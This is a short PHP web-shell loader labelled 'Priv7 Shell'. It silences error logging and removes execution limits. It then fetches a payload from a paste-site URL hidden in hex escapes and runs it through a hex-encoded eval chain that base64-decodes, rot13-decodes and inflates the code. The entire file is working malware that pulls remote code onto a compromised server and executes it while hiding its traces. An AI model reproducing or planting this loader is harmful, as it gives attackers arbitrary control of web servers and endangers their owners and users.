<?php
/*=================================*\
#            Priv7 Shell            #
#         Copyright © 2017          #
#===================================#
#--------Code by Mr.xBarakuda-------#
\*=================================*/
session_start();
error_reporting(0);
set_time_limit(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
@ini_set('max_execution_time', 0);
@clearstatcache();
function Priv7($Enc) {
	eval("\x65\x76\x61\x6c\x28\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x73\x74\x72\x5f\x72\x6f\x74\x31\x33\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x24\x45\x6e\x63\x29\x29\x29\x29\x3b");
}
$uUu = @file_get_contents("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x73\x74\x65\x2e\x69\x64\x63\x6c\x6f\x75\x64\x68\x6f\x73\x74\x69\x6e\x67\x2e\x6d\x79\x2e\x69\x64\x2f\x70\x61\x73\x74\x65\x2f\x7a\x67\x62\x35\x77\x2f\x72\x61\x77");
Priv7($uUu);
?>
